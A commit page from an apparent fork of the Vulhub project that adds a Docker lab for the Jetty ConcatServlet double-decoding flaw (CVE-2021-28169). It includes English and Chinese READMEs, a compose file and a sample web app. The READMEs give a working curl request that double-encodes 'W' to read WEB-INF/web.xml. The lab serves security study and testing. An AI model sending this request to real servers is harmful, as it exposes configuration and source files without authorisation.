aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
jetty/CVE-2021-28169/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 165 KiB

BIN
jetty/CVE-2021-28169/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 168 KiB

39
jetty/CVE-2021-28169/README.md Normal file
View File

@@ -0,0 +1,39 @@
# Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability (CVE-2021-28169)
[中文版本(Chinese version)](README.zh-cn.md)
Eclipse Jetty is a Java web server and Java Servlet container.
Before version 9.4.40, 10.0.2, 11.0.2, the `ConcatServlet` and `WelcomeFilter` classes in Jetty Servlets are influenced by a double decoding bug. If developers use these two classes manually, attackers can use them to download arbitrary sensitive files in the WEB-INF directory.
Reference links.
- https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq
## Vulnerable Application
Execute the following command to start a Jetty 9.4.40 server.
```
docker compose up -d
```
After the server starts, visit ``http://your-ip:8080`` to see an example page. This page uses the `ConcatServlet` to optimize the loading of static files:
```
<link rel="stylesheet" href="/static?/css/base.css&/css/app.css">
```
## Exploit
The sensitive file web.xml is not accessible through `/static?/WEB-INF/web.xml`.
![](1.png)
Double URL encoding `W` to bypass the restriction:
```
curl -v 'http://your-ip:8080/static?/%2557EB-INF/web.xml'
```
![](2.png)

37
jetty/CVE-2021-28169/README.zh-cn.md Normal file
View File

@@ -0,0 +1,37 @@
# Jetty 通用 Servlets 组件 ConcatServlet 信息泄露漏洞CVE-2021-28169
Eclipse Jetty是一个开源的servlet容器它为基于Java的Web容器提供运行环境而Jetty Servlets是Jetty提供给开发者的一些通用组件。
在9.4.40, 10.0.2, 11.0.2版本前Jetty Servlets中的`ConcatServlet``WelcomeFilter`类存在多重解码问题如果开发者主动使用了这两个类攻击者可以利用其访问WEB-INF目录下的敏感文件造成配置文件及代码泄露。
参考链接:
- https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq
## 漏洞环境
执行如下命令启动一个Jetty 9.4.40服务器:
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080`即可查看到一个example页面。该页面使用到了`ConcatServlet`来优化静态文件的加载:
```
<link rel="stylesheet" href="/static?/css/base.css&/css/app.css">
```
## 漏洞利用
正常通过`/static?/WEB-INF/web.xml`无法访问到敏感文件web.xml
![](1.png)
对字母`W`进行双URL编码即可绕过限制访问web.xml
```
curl -v 'http://your-ip:8080/static?/%2557EB-INF/web.xml'
```
![](2.png)

8
jetty/CVE-2021-28169/docker-compose.yml Normal file
View File

@@ -0,0 +1,8 @@
version: '2.2'
services:
web:
image: vulhub/jetty:9.4.40
ports:
- "8080:8080"
volumes:
- ./src:/opt/jetty/webapps/ROOT

16
jetty/CVE-2021-28169/src/WEB-INF/web.xml Normal file
View File

@@ -0,0 +1,16 @@
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
<display-name>Archetype Created Web Application</display-name>
<servlet>
<servlet-name>Concat</servlet-name>
<servlet-class>org.eclipse.jetty.servlets.ConcatServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>Concat</servlet-name>
<url-pattern>/static</url-pattern>
</servlet-mapping>
</web-app>

18
jetty/CVE-2021-28169/src/css/app.css Normal file
View File

@@ -0,0 +1,18 @@
div {
width: 600px;
margin: 5em auto;
padding: 2em;
background-color: #fdfdff;
border-radius: 0.5em;
box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
}
a:link, a:visited {
color: #38488f;
text-decoration: none;
}
@media (max-width: 700px) {
div {
margin: 0 auto;
width: auto;
}
}

7
jetty/CVE-2021-28169/src/css/base.css Normal file
View File

@@ -0,0 +1,7 @@
body {
background-color: #f0f0f2;
margin: 0;
padding: 0;
font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
}

21
jetty/CVE-2021-28169/src/index.jsp Normal file
View File

@@ -0,0 +1,21 @@
<!doctype html>
<html>
<head>
<title>Example Domain</title>
<meta charset="utf-8" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="stylesheet" href="/static?/css/base.css&/css/app.css">
</head>
<body>
<div>
<h1><% out.println("Example Domain"); %></h1>
<p>This domain is for use in illustrative examples in documents. You may use this
domain in literature without prior coordination or asking for permission.</p>
<p><a href="https://www.iana.org/domains/example">More information...</a></p>
</div>
</body>
</html>